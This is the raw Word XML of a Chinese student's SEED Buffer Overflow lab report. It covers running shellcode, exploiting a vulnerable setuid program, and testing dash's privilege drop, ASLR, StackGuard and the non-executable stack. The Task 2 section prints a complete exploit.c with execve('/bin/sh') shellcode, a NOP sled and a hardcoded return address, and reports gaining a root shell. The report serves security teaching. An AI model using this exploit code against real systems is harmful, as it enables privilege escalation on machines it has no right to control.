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CC734" w14:textId="347944B4" w:rsidR="00157468" w:rsidRPr="006B08A1" w:rsidRDefault="00157468" w:rsidP="001574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color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B08A1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">Buffer Overflow </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6842E516" w14:textId="34802E34" w:rsidR="00F80E6E" w:rsidRDefault="006B08A1" w:rsidP="006B08A1">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>57117224马鸣宇</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695B7CF8" w14:textId="77777777" w:rsidR="002465B6" w:rsidRPr="0006693D" w:rsidRDefault="00AA46D1">
      <w:pPr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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0006693D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</w:rPr>
        <w:t>Task 1: Running Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FAE896" w14:textId="74DC9573" w:rsidR="0006693D" w:rsidRDefault="0006693D" w:rsidP="00D63021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45B2DAF" wp14:editId="4D5E52CA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2080260" cy="21336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04 下午21.37.20 下午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95" b="47826"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2080260" cy="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021">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D63021">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D63021">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的-</w:t>
      </w:r>
      <w:r w:rsidR="00D63021">
        <w:t xml:space="preserve">z </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D63021">
        <w:t>execstack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D63021">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项编译</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D63021">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidR="00D63021">
        <w:t>_shellcode.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D63021">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D61939" w14:textId="3B91B8E6" w:rsidR="00D63021" w:rsidRDefault="00D63021" w:rsidP="00D63021">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行程序，发现成功调用了shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31928576" w14:textId="5F55AD0C" w:rsidR="00AA46D1" w:rsidRDefault="00AA46D1"/>
    <w:p w14:paraId="5D16CD1E" w14:textId="77777777" w:rsidR="00F362E3" w:rsidRDefault="00F362E3"/>
    <w:p w14:paraId="4EC7DC27" w14:textId="77777777" w:rsidR="00D63021" w:rsidRPr="0006693D" w:rsidRDefault="00F362E3">
      <w:pPr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06693D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Task 2: Exploiting the Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F7F0DE" w14:textId="250DA910" w:rsidR="0006693D" w:rsidRDefault="0006693D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759C8DD" wp14:editId="762BF8D3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3497580</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>10795</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1958400" cy="579600"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapSquare wrapText="bothSides"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04 下午22.48.47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400" cy="5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D78" w:rsidRPr="0018589B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把</w:t>
      </w:r>
      <w:r w:rsidR="00762D78" w:rsidRPr="0018589B">
        <w:t>BUF</w:t>
      </w:r>
      <w:r w:rsidR="00762D78" w:rsidRPr="0018589B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00762D78" w:rsidRPr="0018589B">
        <w:t>SIZE</w:t>
      </w:r>
      <w:r w:rsidR="00762D78" w:rsidRPr="0018589B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置为2</w:t>
      </w:r>
      <w:r w:rsidR="00762D78" w:rsidRPr="0018589B">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00762D78" w:rsidRPr="0018589B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，对</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00762D78" w:rsidRPr="0018589B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sta</w:t>
      </w:r>
      <w:r w:rsidR="00762D78" w:rsidRPr="0018589B">
        <w:t>ck.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00762D78" w:rsidRPr="0018589B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行编译之后使用G</w:t>
      </w:r>
      <w:r w:rsidR="00762D78" w:rsidRPr="0018589B">
        <w:t>DB</w:t>
      </w:r>
      <w:r w:rsidR="00762D78" w:rsidRPr="0018589B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64559F5B" w14:textId="628246E0" w:rsidR="00F362E3" w:rsidRPr="0018589B" w:rsidRDefault="00762D78">
      <w:r w:rsidRPr="0018589B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0018589B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0018589B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置断点，使用run</w:t>
      </w:r>
      <w:r w:rsidR="007E61B9" w:rsidRPr="0018589B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后查看相关信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CF4212" w14:textId="1A5AB63B" w:rsidR="007E61B9" w:rsidRDefault="007E61B9"/>
    <w:p w14:paraId="0126887B" w14:textId="77777777" w:rsidR="007E61B9" w:rsidRDefault="007E61B9" w:rsidP="007E61B9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计算出buffer和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返回地址之间的距离为3</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668B1F32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exploit.c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*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0238AB1E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A program that creates a file containing code for launching shell */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53094B3B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stdlib.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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2697EC28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stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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2D4B7D38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string.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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char </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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shellcode[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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] =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440F9A25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\x31\xc0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1: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xorl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%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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eax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,%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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eax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*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25995E40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\x50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2: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pushl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%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eax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*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C18ACE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\x68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""//</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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3: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pushl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$0x68732f2f */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F6B43D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\x68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""/bin"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4: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pushl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$0x6e69622f */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616D52DD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\x89\xe3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5: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movl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%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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esp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,%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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ebx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*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A10C5CC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\x50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6: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pushl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%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eax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*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3080F0F6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\x53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7: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pushl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%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ebx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*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA8DCA4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\x89\xe1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8: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movl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%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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esp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,%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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ecx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*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32256029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\x99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9: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cdq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*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE6E3E7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\xb0\x0b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10: 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movb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$0x0</w:t>
      </w:r>
      <w:proofErr w:type="gram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b,%</w:t>
      </w:r>
      <w:proofErr w:type="gram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al */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC1FB0B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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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xcd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0006693D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\x80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Line 11: int $0x80 */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC8C4F0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57381343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06693D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>main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argc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**</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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argv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1D47D6A5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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68024198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buffer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gramEnd"/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517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</w:p>
    <w:p w14:paraId="399B5343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FILE *</w:t>
      </w:r>
      <w:proofErr w:type="spell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badfile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16D61286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Initialize buffer with 0x90 (NOP instruction) */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9168B6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06693D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>memset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&amp;buffer,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0x90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517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3E6AD347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start =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517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- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sizeof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(shellcode) / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sizeof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2338175F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06693D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>strcpy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buffer + start, code);   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E5636A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unsigned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ret =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0xbfffec58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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3023B36C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/* $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0006693D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (0xbfffeb68) */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</w:p>
    <w:p w14:paraId="64A70EDF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lastRenderedPageBreak/>
        <w:t>buffer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gramEnd"/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36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] =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0x58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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F27CA4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buffer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gramEnd"/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37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] =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0xec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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA4948B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buffer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gramEnd"/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38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] =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0xff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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E360CD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buffer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gramEnd"/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39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] =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0xbf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6E057D2C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06693D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fwrite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buffer,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517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badfile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);    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A005FB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06693D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fclose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badfile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);   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1257E9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586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>return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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C34470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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45253868" w14:textId="534E1BD4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2D77A92D" w14:textId="768E8036" w:rsidR="00874F71" w:rsidRDefault="0006693D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5A36764" wp14:editId="6537E857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3208020" cy="906780"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapSquare wrapText="bothSides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04 下午23.40.13 下午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13"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="320802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E4FC7" w14:textId="77777777" w:rsidR="0006693D" w:rsidRDefault="0006693D" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2513872E" w14:textId="77777777" w:rsidR="0006693D" w:rsidRDefault="0006693D" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62A1DDCA" w14:textId="2CD93D5B" w:rsidR="00185756" w:rsidRDefault="00185756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如图所示，已经获得root权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C6824B" w14:textId="77777777" w:rsidR="00CE2600" w:rsidRDefault="00CE2600" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="598BD41C" w14:textId="77777777" w:rsidR="0006693D" w:rsidRDefault="0006693D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</w:p>
    <w:p w14:paraId="2FE3A2C9" w14:textId="77777777" w:rsidR="0006693D" w:rsidRDefault="0006693D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</w:p>
    <w:p w14:paraId="61416FD7" w14:textId="77777777" w:rsidR="0006693D" w:rsidRDefault="0006693D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</w:p>
    <w:p w14:paraId="38817760" w14:textId="4AE8D508" w:rsidR="00CD6D25" w:rsidRPr="0006693D" w:rsidRDefault="00CE2600" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0006693D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Task 3: Defeating dash’s Countermeasure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044B6D12" w14:textId="18092728" w:rsidR="0006693D" w:rsidRDefault="0006693D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9040895" wp14:editId="36A96F27">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2263140</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>123825</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3183255" cy="510540"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapSquare wrapText="bothSides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05 下午10.15.18 上午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93"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3183255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D68BA" w14:textId="4BF1D870" w:rsidR="00CD6D25" w:rsidRDefault="00CE2600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取消注释之后，运行程序所得结果为获取到root用户的shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38379305" w14:textId="5927C30C" w:rsidR="00CE2600" w:rsidRDefault="00CE2600" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="470FEC6D" w14:textId="77777777" w:rsidR="00CE2600" w:rsidRDefault="00CE2600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若R</w:t>
      </w:r>
      <w:r>
        <w:t>UID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和E</w:t>
      </w:r>
      <w:r>
        <w:t>UID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同，或是用户组的两者不同，dash会降低权限，若使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将R</w:t>
      </w:r>
      <w:r>
        <w:t>UID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置为root，就会导致E</w:t>
      </w:r>
      <w:r>
        <w:t>UID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和其一致，因此dash不会降低其权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EDE19F" w14:textId="77777777" w:rsidR="00CE2600" w:rsidRDefault="00CE2600" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68F56A4D" w14:textId="5D8BBAC1" w:rsidR="00CE2600" w:rsidRDefault="00CE2600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>Task 4: Defeating Address Randomization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54886284" w14:textId="77777777" w:rsidR="006B08A1" w:rsidRPr="006B08A1" w:rsidRDefault="006B08A1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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="000406CE" w14:textId="7EB7A547" w:rsidR="006B08A1" w:rsidRDefault="006B08A1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2BAFF83F" wp14:editId="10217A2C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230880" cy="670560"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20864"/>
                <wp:lineTo x="21524" y="20864"/>
                <wp:lineTo x="21524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05 下午10.21.57 上午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98"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="323088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FBE823" w14:textId="24C39854" w:rsidR="00CE2600" w:rsidRDefault="00CE2600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打开随机地址，运行stack，发生错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40054A3A" w14:textId="4A9DCC36" w:rsidR="00CE2600" w:rsidRDefault="00CE2600" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0405EBA8" w14:textId="77777777" w:rsidR="006B08A1" w:rsidRDefault="006B08A1" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25FD5FCC" w14:textId="4829BB5E" w:rsidR="00CE2600" w:rsidRDefault="006B08A1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C8898E4" wp14:editId="0E368B53">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2247900</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3221990" cy="716280"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21255"/>
                <wp:lineTo x="21455" y="21255"/>
                <wp:lineTo x="2145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05 下午10.25.28 上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600">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行所给代码，最终在打开随机地址的情况下最终也成功地进行了攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0450EEF4" w14:textId="60EFBBC0" w:rsidR="00CE2600" w:rsidRDefault="00CE2600" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FEBB1F3" w14:textId="77777777" w:rsidR="006271F8" w:rsidRDefault="006271F8" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="001690AC" w14:textId="77777777" w:rsidR="006271F8" w:rsidRPr="006B08A1" w:rsidRDefault="006271F8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 xml:space="preserve">Task 5: Turn on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>StackGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB8BE58" w14:textId="77777777" w:rsidR="006271F8" w:rsidRDefault="006271F8" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>关闭地址随机化，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不使用-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-stack-protector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项，运行stack报错，原因是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溢出攻击被检测到。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566B2816" w14:textId="77777777" w:rsidR="006271F8" w:rsidRDefault="006271F8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282E1A9" wp14:editId="7217C54B">
            <wp:extent cx="5486400" cy="381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05 下午10.27.52 上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ADAE" w14:textId="77777777" w:rsidR="006271F8" w:rsidRDefault="006271F8" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="242CD650" w14:textId="29816D0E" w:rsidR="006271F8" w:rsidRPr="006B08A1" w:rsidRDefault="006271F8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>Task 6: Turn on the Non-executable Stack Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFBFAE3" w14:textId="5C9738F3" w:rsidR="006B08A1" w:rsidRDefault="006B08A1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14F8B13B" wp14:editId="3CDA2F7F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1645920</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>9525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3808800" cy="1144800"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21216"/>
                <wp:lineTo x="21499" y="21216"/>
                <wp:lineTo x="21499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05 下午10.21.57 上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67654" w14:textId="30483147" w:rsidR="006271F8" w:rsidRDefault="006271F8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hint="eastAsia"/>
        </w:rPr>
        <w:t>编译时使用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</w:rPr>
        <w:t>noexecstack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>选项。运行攻击程序，发现攻击失败。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4996685B" w14:textId="11AB713A" w:rsidR="006271F8" w:rsidRDefault="006271F8" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AAC21DF" w14:textId="77777777" w:rsidR="006B08A1" w:rsidRDefault="006B08A1" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FD8DFDF" w14:textId="77777777" w:rsidR="006B08A1" w:rsidRDefault="006B08A1" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A2E3DDB" w14:textId="689C50E9" w:rsidR="006271F8" w:rsidRDefault="006271F8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如果指令地址在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上，保护机制就会起作用，攻击程序就会报错</w:t>
      </w:r>
    </w:p>
